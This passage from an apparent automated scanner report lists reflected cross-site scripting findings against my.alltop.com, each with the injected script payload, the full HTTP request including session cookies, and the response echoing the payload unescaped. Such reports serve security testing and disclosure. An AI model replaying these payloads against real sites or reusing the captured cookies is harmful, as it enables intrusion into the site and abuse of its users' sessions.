X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:46 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:47 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:47 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E9)%3C/script%3E33c92"><script>alert(1)</script>c39e161a26a" method="post" accept-charset="utf-8">
...[SNIP]...

1.46. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de3e"><script>alert(1)</script>6fda5037cda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b'%22--%3E%3C5de3e"><script>alert(1)</script>6fda5037cda/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:00 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:00 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b'%22--%3E%3C5de3e"><script>alert(1)</script>6fda5037cda/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.47. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd035"><script>alert(1)</script>c63524382bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b'%22--%3E%3C/style%3E%3Cfd035"><script>alert(1)</script>c63524382bb/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:03 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:03 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:03 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b'%22--%3E%3C/style%3E%3Cfd035"><script>alert(1)</script>c63524382bb/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.48. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5062"><script>alert(1)</script>2da5f045f4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3Cd5062"><script>alert(1)</script>2da5f045f4/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:11 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:11 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3Cd5062"><script>alert(1)</script>2da5f045f4/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.49. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 532db"><script>alert(1)</script>53992fc5b37 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E532db"><script>alert(1)</script>53992fc5b37 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:12 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E532db"><script>alert(1)</script>53992fc5b37" method="post" accept-charset="utf-8">
...[SNIP]...

1.50. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60135"><script>alert(1)</script>2cb98114909 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E?60135"><script>alert(1)</script>2cb98114909=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:58 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:58 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E?60135"><script>alert(1)</script>2cb98114909=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.51. http://my.alltop.com/alpha/b/%22ns=%22netsparker(0x000167) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b/%22ns=%22netsparker(0x000167)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c4c"><script>alert(1)</script>35bcdd6c458 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b75c4c"><script>alert(1)</script>35bcdd6c458/%22ns=%22netsparker(0x000167) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:02 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:04 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:04 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b75c4c"><script>alert(1)</script>35bcdd6c458/%22ns=%22netsparker(0x000167)" method="post" accept-charset="utf-8">
...[SNIP]...

1.52. http://my.alltop.com/alpha/b/%22ns=%22netsparker(0x000167) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b/%22ns=%22netsparker(0x000167)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 593e6"><script>alert(1)</script>4a1d1b6d74f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b/%22ns593e6"><script>alert(1)</script>4a1d1b6d74f=%22netsparker(0x000167) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:08 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:09 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:09 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b/%22ns593e6"><script>alert(1)</script>4a1d1b6d74f=%22netsparker(0x000167)" method="post" accept-charset="utf-8">
...[SNIP]...

1.53. http://my.alltop.com/alpha/b/%22ns=%22netsparker(0x000167) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b/%22ns=%22netsparker(0x000167)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1219d"><script>alert(1)</script>2819410e845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b/%22ns=%22netsparker(0x000167)?1219d"><script>alert(1)</script>2819410e845=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
